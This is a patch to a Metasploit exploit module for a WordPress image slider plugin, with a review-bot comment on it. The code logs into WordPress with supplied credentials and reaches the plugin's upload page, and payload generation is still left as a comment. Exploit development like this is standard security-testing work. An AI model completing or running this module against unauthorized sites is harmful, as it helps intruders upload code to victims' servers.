From 8f89275df820c09798daf7f97f05458d4b31f4a3 Mon Sep 17 00:00:00 2001
From: Shelby Pace
Date: Wed, 25 Jul 2018 14:22:24 -0500
Subject: [PATCH] authenticating to WordPress
---
.../wp_responsive_thumbnail_slider_upload.rb | 59 ++++++++++++++++++-
1 file changed, 58 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
index edd34fcf98..2f736c8931 100644
--- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
+++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
@@ -45,12 +45,69 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def check
+ # check for WordPress
+ # check if plugin is installed
 end
 # log into Wordpress
 # access 'manage images' page
 # upload file
- def exploit
+ def login
+ wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => wp_uri
+ )
+
+ if res && res.body.include?("WordPress") && res.body.include?("200")
+ print_status("WordPress accessed")
+ else
+ fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
+ end
+
+ redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
+ cookies = res.get_cookies
+ wp_login_res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => wp_uri,
+ 'cookie' => cookies,
+ 'vars_post' => {
+ 'log' => datastore['USERNAME'],
+ 'pwd' => datastore['PASSWORD'],
+ 'wp-submit' => 'Log In',
+ 'redirect_to' => redirect_uri
+ }
+ )
+
+ auth_cookies = wp_login_res.get_cookies
+ auth_res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => redirect_uri,
+ 'cookie' => auth_cookies
+ )
+
+ return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
+
+ print_good("Logged into WordPress")
+ upload_payload(auth_cookies)
 end
+ def upload_payload(cookies)
+ # attempt to access plugins page
+ plugin_res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
+ 'cookie' => cookies
+ )
+
+ unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
+ fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page")
+ end
+
+ # generate payload
+ end
+
+ def exploit
+ login
+ end
 end
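Review bot: In `login`, the first guard tests `res.body.include?("200")`, which looks for the text "200" in the page body rather than checking the HTTP status, so the result depends on page content; `if res && res.code == 200 && res.body.include?("WordPress")` states the intent. `wp_login_res.get_cookies` runs with no nil check, and `send_request_cgi` returns nil when the request times out, so a dropped connection ends in a NoMethodError instead of a clean `fail_with`; add `fail_with(Failure::Unreachable, "No response to the login request") unless wp_login_res` before it. `check` still contains only comments and so returns nil rather than a check code, and the `return` in front of `fail_with` is redundant since `fail_with` raises. The enclosing class starts outside the hunk.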